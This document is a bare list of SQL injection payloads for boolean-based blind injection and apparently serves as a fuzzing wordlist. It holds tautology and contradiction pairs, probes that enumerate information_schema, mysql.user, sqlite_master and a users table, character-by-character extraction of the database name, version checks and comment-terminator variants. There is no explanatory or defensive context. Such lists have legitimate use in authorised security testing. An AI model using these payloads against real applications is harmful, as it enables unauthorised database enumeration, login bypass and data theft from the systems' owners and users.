' AND '1'='1
' AND '1'='2
' OR '1'='1
' OR '1'='2
' AND 1=1
' AND 1=2
' OR 1=1
' OR 1=2
' AND (SELECT COUNT(*) FROM users)>0
' AND (SELECT COUNT(*) FROM information_schema.tables)>10
' AND (SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users')>1
' AND ASCII(SUBSTRING((SELECT DATABASE()), 1, 1)) > 65
' AND ASCII(SUBSTRING((SELECT DATABASE()), 1, 1)) < 90
' AND (SELECT 1 FROM dual) IS NOT NULL
' AND EXISTS(SELECT 1 FROM users WHERE username='admin')
" AND "1"="1
" AND "1"="2
" OR "1"="1
" OR "1"="2
1 AND 1=1
1 AND 1=2
1 OR 1=1
1 OR 1=2
' AND SUBSTRING(@@version,1,1)='5
' AND (SELECT COUNT(*) FROM mysql.user)>0
' AND (SELECT LENGTH(database()))>1
' AND (SELECT COUNT(*) FROM sqlite_master)>0
' AND 1=(SELECT 1 FROM pg_sleep(0))--
') AND ('1'='1
') OR ('1'='1
')) AND (('1'='1
%' AND '1'='1
%' OR '1'='1
' AND 1=1--
' AND 1=1#
' AND 1=1/*